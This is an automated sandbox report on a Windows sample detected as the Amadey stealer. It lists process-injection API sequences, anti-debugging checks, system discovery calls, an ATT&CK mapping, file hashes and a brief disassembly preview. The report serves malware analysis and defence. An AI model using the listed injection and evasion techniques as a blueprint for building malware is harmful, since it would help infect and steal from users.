Source: C:\Users\user\Desktop\hBB2KnTndI.exe

API call chain: ExitProcess graph end node

graph_0-107165

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 5_2_00417C96 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00417C96

Source: C:\Users\user\Desktop\hBB2KnTndI.exe

Code function: 0_2_00401340 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,atexit,

0_2_00401340

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 5_2_00402C50 DeleteObject,GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,

5_2_00402C50

Source: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe

Code function: 7_2_0024D53A rdtsc

7_2_0024D53A

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00411C06 mov eax, dword ptr fs:[00000030h]	0_2_00411C06
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00411C06 mov eax, dword ptr fs:[00000030h]	0_2_00411C06
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_00411C06 mov eax, dword ptr fs:[00000030h]	0_2_00411C06
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004EEBEC mov eax, dword ptr fs:[00000030h]	0_2_004EEBEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00419122 mov eax, dword ptr fs:[00000030h]	5_2_00419122
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00415391 mov eax, dword ptr fs:[00000030h]	5_2_00415391

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Code function: 0_2_004011A5 SetUnhandledExceptionFilter,_iob,_setmode,_setmode,_setmode,__p__fmode,__p__environ,KiUserExceptionDispatcher,_cexit,ExitProcess,	0_2_004011A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00413738 SetUnhandledExceptionFilter,	5_2_00413738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00413983 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00413983
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00417C96 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00417C96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_004135D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_004135D3
Source: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe	Code function: 7_2_0024F580 ?terminate@@YAXXZ,__crtSetUnhandledExceptionFilter,	7_2_0024F580

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000			Jump to behavior
Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: BCE008			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\hBB2KnTndI.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\hBB2KnTndI.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\hBB2KnTndI.exe

Code function: 0_2_004EEC21 CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_004EEC21

Contains functionality to prevent local Windows debugging

Source: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe

Code function: 7_2_0024915E LoadLibraryExW,GetProcAddress,FreeLibrary,IsDebuggerPresent,DebugBreak,

7_2_0024915E

Source: C:\Users\user\Desktop\hBB2KnTndI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe "C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe"			Jump to behavior

Source: C:\Users\user\Desktop\hBB2KnTndI.exe

Code function: 0_2_004C9813 cpuid

0_2_004C9813

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 5_2_00413811 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00413811

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 5_2_00421B1C _free,GetTimeZoneInformation,_free,

5_2_00421B1C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 5_2_00405230 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

5_2_00405230

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 5_2_0040F1D0 IsUserAnAdmin,GetUserNameW,GetComputerNameExW,

5_2_0040F1D0

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.3.hBB2KnTndI.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.hBB2KnTndI.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hBB2KnTndI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.hBB2KnTndI.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.hBB2KnTndI.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.hBB2KnTndI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.263489058.0000000000401000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.259020968.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261443990.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260767513.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	Path Interception	511 Process Injection	1 Virtualization/Sandbox Evasion	1 Input Capture	2 System Time Discovery	Remote Services	1 Screen Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	511 Process Injection	LSASS Memory	4 Security Software Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	3 Obfuscated Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	14 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hBB2KnTndI.exe	39%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe	2%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.3.hBB2KnTndI.exe.8b0000.0.unpack	100%	Avira	HEUR/AGEN.1237917		Download File
5.2.AppLaunch.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1237910		Download File

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://gcc.gnu.org/bugs.html):	hBB2KnTndI.exe	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	635800
Start date and time: 29/05/202219:32:06	2022-05-29 19:32:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	hBB2KnTndI (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.spyw.evad.winEXE@7/5@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 4.4% (good quality ratio 4%) Quality average: 72.3% Quality standard deviation: 31.7%
HCA Information:	Successful, ratio: 90% Number of executed functions: 38 Number of non-executed functions: 196
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.40.129.122, 20.189.173.20
Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, arc.trafficmanager.net, iris-de-prod-azsc-frc.francecentral.cloudapp.azure.com, watson.telemetry.microsoft.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:33:20	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe	FORTNITEA.exe	Get hash	malicious	Browse
	SqBYgi0x4H.exe	Get hash	malicious	Browse
	61wg87Mp5s.exe	Get hash	malicious	Browse
	xwBgnRX7mc.exe	Get hash	malicious	Browse
	7uvkuUP9Ki.exe	Get hash	malicious	Browse
	updated.exe	Get hash	malicious	Browse
	h4fbH7kLXV.exe	Get hash	malicious	Browse
	bvOGvz01O9.exe	Get hash	malicious	Browse
	31201672.exe	Get hash	malicious	Browse
	16440147.exe	Get hash	malicious	Browse
	net.exe	Get hash	malicious	Browse
	TbDXlssS18.exe	Get hash	malicious	Browse
	99TdCVWLNI.exe	Get hash	malicious	Browse
	99TdCVWLNI.exe	Get hash	malicious	Browse
	gBIqPAcGLq.exe	Get hash	malicious	Browse
	IV5Mp1B4F7.exe	Get hash	malicious	Browse
	PnmZUzGgZm.exe	Get hash	malicious	Browse
	PnmZUzGgZm.exe	Get hash	malicious	Browse
	rTxXMIDYVm.exe	Get hash	malicious	Browse
	wULsKXnhf7.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hBB2KnTndI.exe_ad2fc02f1e967b8af8cf5fed27f1f4916534b2_362a01e9_181a7760\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6829987815203323
Encrypted:	false
SSDEEP:	96:eEFJo531hDNH7DAfFpXIQcQvc6QcEDMcw3Dz+HbHg/5VG4rmMOyWZAXGng5FMTP/:HDo53F8HBUZMXwjlq/u7sTS274ItE
MD5:	5B5EA8AF84945A314F06185BEB825769
SHA1:	3E34A503CC4E9725C5609FB483F1AA1B023D4D16
SHA-256:	5771E8F70785FBB148B119707D9530C20736187595F2C181684E3235DBED5C72
SHA-512:	51099F32A4546EEFEF1BFAABDF76D62077AC34F04291EF53BFCA95F21584AAB71D75E838D83408EE6F7806CB2A43D955F7153C45B023017985D42E13AA15CAE2
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.8.3.5.1.5.9.6.2.2.0.6.8.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.8.3.5.1.5.9.7.8.7.6.9.2.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.4.d.8.6.f.c.-.4.1.e.0.-.4.a.f.f.-.a.8.e.8.-.1.6.3.1.8.4.7.b.6.6.1.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.9.4.7.3.0.6.-.b.d.e.e.-.4.5.2.9.-.8.2.8.1.-.f.1.0.7.4.7.b.9.d.f.5.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.B.B.2.K.n.T.n.d.I...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.a.c.-.0.0.0.1.-.0.0.1.d.-.4.b.e.8.-.0.7.9.6.c.d.7.3.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.1.9.a.6.8.d.c.7.b.4.d.3.5.6.1.6.f.6.1.b.3.2.1.2.a.4.1.d.9.f.0.0.0.0.f.f.f.f.!.0.0.0.0.f.c.c.1.3.d.5.2.b.f.2.8.4.1.6.f.3.b.8.a.5.9.4.d.5.8.1.1.3.f.d.8.8.2.8.a.4.0.9.3.!.h.B.B.2.K.n.T.n.d.I...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER66C6.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon May 30 02:33:16 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	32426
Entropy (8bit):	2.022186547098741
Encrypted:	false
SSDEEP:	192:7ToTR5OehwDu8DusI0LrIPm7QMcU8irraOTgntPw:/e+y8Du7G0mQPHiv
MD5:	9CFC1F9C7F8E9B23594FE26427E5253D
SHA1:	01F0CDD0A22805105883C4B3930AD44CDFA9E350
SHA-256:	7D63809B96E2686DE1BCE10CF9129283E9A7FFFF43CD05F60E52F22FA920D66B
SHA-512:	C6AD471D4EBB3A31C42374A5F74E7C4BA120C85C91B646D90FFAE261EDDC7B69D39F73E8E4BF5AA86DE60273CA07CC0D69B82B361DEE73A923694CCB7163A158
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........,.b........................................H...........T.......8...........T................s...........................................................................................U...........B..............GenuineIntelW...........T............,.b.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6957.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8290
Entropy (8bit):	3.6987520698451015
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi996e6YWtSU4X7gmfcSUCprx89bb0sfzJm:RrlsNiX6e6YsSU4X7gmfcSCbnfg
MD5:	DECA573E041E2262792347A316BC7F16
SHA1:	388E343B14FA0F2D7D468F83D0AAAFE62C3FB592
SHA-256:	33694A7A970FFD265D0B2E5B6F9DC34874D560E79F9E1EE2762D6965BC0AA37E
SHA-512:	F4BEA1B1B851077E9D35A85F3D10483FB09CE95C3672F33698307AD33BC6F18E43E065A89D12A29B74AD359C9AB2D7B7489FFBC1AFAE9AE957B9CC56B6F532FE
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.2.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B7B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4568
Entropy (8bit):	4.461858019240563
Encrypted:	false
SSDEEP:	48:cvIwSD8zs4JgtWI9hj1XWgc8sqYjf8fm8M4J0HFHz+q8QJ02jKlgd:uITf+4j1mgrsqYQJAz02jegd
MD5:	1361281EBE1DED37788E6218F3B30E8D
SHA1:	9B859030FD96C44D20AEA8638A4CB00482FEC9DC
SHA-256:	7824E5E7F7903D4A2BE8B7441D46C0D301E98E11749BCCFA08354A24EF0DBF78
SHA-512:	D11482242AB2E98D88258A1FD043FF8D6ACBDFDAE73794C5CE223FB85923799C64375A29B85E8A1AE1D7D8CB578653B7A2C4E80EA8B1C9DF0BDE1BB2E370BD1F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1537183" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Temp\a10b8dfb5f\orxds.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	98912
Entropy (8bit):	6.288162510609848
Encrypted:	false
SSDEEP:	1536:mdCQC+TbenjRV4hbdZ7Fbk7zrbITCFcnMeaYNVq7B7d:mdCQZTbejTHXACFcnMjiMJ
MD5:	6807F903AC06FF7E1670181378690B22
SHA1:	901EC730ADC4A7C8531E8DA343A977E04FDE8B03
SHA-256:	115D04150F524C103CA08E18305B0B103A3767336E19404235D2017F4B233CE5
SHA-512:	37CC7812BFD4F5A4D81D7D4B5B5906D35928856BFAF7B532481B4233AFA36E9C41C3D42D84290288A0DEB47F5D8CD54FE1280C1E0F639B8240F9AB2638716EEB
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 2%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: FORTNITEA.exe, Detection: malicious, Browse Filename: SqBYgi0x4H.exe, Detection: malicious, Browse Filename: 61wg87Mp5s.exe, Detection: malicious, Browse Filename: xwBgnRX7mc.exe, Detection: malicious, Browse Filename: 7uvkuUP9Ki.exe, Detection: malicious, Browse Filename: updated.exe, Detection: malicious, Browse Filename: h4fbH7kLXV.exe, Detection: malicious, Browse Filename: bvOGvz01O9.exe, Detection: malicious, Browse Filename: 31201672.exe, Detection: malicious, Browse Filename: 16440147.exe, Detection: malicious, Browse Filename: net.exe, Detection: malicious, Browse Filename: TbDXlssS18.exe, Detection: malicious, Browse Filename: 99TdCVWLNI.exe, Detection: malicious, Browse Filename: 99TdCVWLNI.exe, Detection: malicious, Browse Filename: gBIqPAcGLq.exe, Detection: malicious, Browse Filename: IV5Mp1B4F7.exe, Detection: malicious, Browse Filename: PnmZUzGgZm.exe, Detection: malicious, Browse Filename: PnmZUzGgZm.exe, Detection: malicious, Browse Filename: rTxXMIDYVm.exe, Detection: malicious, Browse Filename: wULsKXnhf7.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O...!R..!R..!RR..R..!R8..R..!R8..R..!R8..R..!R8..R..!R...R..!R.. Rg.!RR..R..!R.Y.R..!R.Y.R..!R.Y.R..!RRich..!R........................PE..L..._X.Z.........."..........2............... ....@..................................@....@...... ...........................A.......P...............D..`>...`..........T..............................@............@...............................text............................... ..`.data........ ......................@....idata..j....@......................@..@.rsrc........P....... ..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.357132284261992
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hBB2KnTndI.exe
File size:	2476494
MD5:	b413ff6e943c415afc26640ff535c724
SHA1:	fcc13d52bf28416f3b8a594d58113fd8828a4093
SHA256:	7ff0ff6e51a58398ad73da3cc8e7e6233a23e49d93aaa4b190672e4f9f08b9bb
SHA512:	ca5ac0fc7aa0ed1a615ccd628b8b97b3d83b31e0da58b9d9e23e4e9f97bfa598920119e8afbbdac6e97c994e8739651083fd1afe69384d25a1fd6bc4702ce815
SSDEEP:	24576:dofQL0YjKOTrGRTnFZUDt4KZHD6XyeOjuTfedlb0hv4d7KXl8p+NauQ5V3h357:dofQL0YjKOTrGJ7C5iOjuTWdlxd7Kc
TLSH:	1CB51A135A8B0E75DDC23BB4A1CB633E9734EE30CA2A9B7FF609C53559532C5681A702
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..b.j...R...........\...H...............p....@...................................&....... ............................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4012e0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x6290AF3D [Fri May 27 11:00:13 2022 UTC]
TLS Callbacks:	0x41bc40, 0x41bbf0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d0dfe559e003c7370c899d20dea7dea8

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	9/2/2021 11:32:59 AM 9/1/2022 11:32:59 AM
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	D15B2B9631F8B37BA8D83A5AE528A8BB
Thumbprint SHA-1:	8740DF4ACB749640AD318E4BE842F72EC651AD80
Thumbprint SHA-256:	2EB421FBB33BBF9C8F6B58C754B0405F40E02CB6328936AAE39DB7A24880EA21
Serial:	33000002528B33AAF895F339DB000000000252

Entrypoint Preview

Instruction
sub esp, 1Ch
mov dword ptr [esp], 00000001h
call dword ptr [005372F0h]
call 00007F0C60A25320h
lea esi, dword ptr [esi+00h]
lea edi, dword ptr [edi+00000000h]
sub esp, 1Ch
mov dword ptr [esp], 00000002h
call dword ptr [005372F0h]
call 00007F0C60A25300h
lea esi, dword ptr [esi+00h]
lea edi, dword ptr [edi+00000000h]
jmp dword ptr [00537328h]
lea esi, dword ptr [esi+00h]
lea edi, dword ptr [edi+00000000h]
jmp dword ptr [00537318h]
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push esi
push ebx
sub esp, 10h
mov dword ptr [esp], 004F1000h
call 00007F0C60A4F479h
sub esp, 04h
test eax, eax
je 00007F0C60A25517h
mov dword ptr [esp], 004F1000h
